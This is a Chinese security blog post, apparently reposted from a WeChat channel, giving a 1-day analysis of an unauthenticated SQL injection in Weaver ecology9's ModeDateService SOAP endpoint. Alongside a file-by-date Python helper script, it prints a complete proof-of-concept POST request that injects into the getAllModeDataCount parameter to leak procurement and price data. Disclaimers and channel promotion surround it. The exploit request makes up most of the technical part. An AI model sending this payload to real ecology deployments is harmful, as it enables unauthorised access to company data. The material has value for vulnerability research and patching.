注:仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。
|
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
现在只对常读和星标的公众号才展示大图推送,建议大家把猫鼠信安“设为星标”,否则可能看不到了!
0x01 前言
挺久没发文了,这段时间也忙,然后也是不知道写什么,发下看泛微的时候记的部分笔记吧,水水,冒个泡证明还在。
0x02 分析
脚本代码:
import osimport argparsefrom datetime import datetimedef find_files_by_modification_date(folder_path, target_date):files = []for root, dirs, filenames in os.walk(folder_path):for filename in filenames:file_path = os.path.join(root, filename)modification_time = os.path.getmtime(file_path)modification_date = datetime.fromtimestamp(modification_time).date()if modification_date == target_date:files.append(file_path)return filesdef main():parser = argparse.ArgumentParser(description="按修改日期查找文件。")parser.add_argument("folder_path", type=str, help="要搜索的文件夹路径")parser.add_argument("target_date", type=str, help="目标修改日期,格式为 YYYY-MM-DD")args = parser.parse_args()folder_path = args.folder_pathtarget_date = datetime.strptime(args.target_date, "%Y-%m-%d").date()files = find_files_by_modification_date(folder_path, target_date)for file in files:print(file)if __name__ == "__main__":main()
这里只分析信息泄露。未做鉴权,可根据资产id查出公司采购的商品及价格。
select id from main_table t1,share_table t2 where 1=1 and t1.id = t2.sourceid and 1 = 11=1 为我们拼接的内容。
POST /services/ModeDateService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx//services/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2KrufzConnection: closeSOAPAction:Content-Type: text/xml;charset=UTF-8Host: xxxContent-Length: 405<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService"><soapenv:Header/><soapenv:Body><mod:getAllModeDataCount><mod:in0>1</mod:in0><mod:in1>1</mod:in1><mod:in2>1=1</mod:in2><mod:in3>1</mod:in3></mod:getAllModeDataCount></soapenv:Body></soapenv:Envelope>
0806
笔记就发这一点吧,xdm可以看看。
点击关注
扫码可进交流群
猫鼠信安知识星球
知识星球中,将定期分享独家的学习资源、书籍推荐、实用技巧和学习方法。还将组织在线讨论和答疑活动,与大家共同交流和探讨。无论你是刚开始学习,还是已经有一定知识储备,我的知识星球都将为你提供一个良好的学习平台。
原文始发于微信公众号(猫鼠信安):泛微ecology9 1day分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论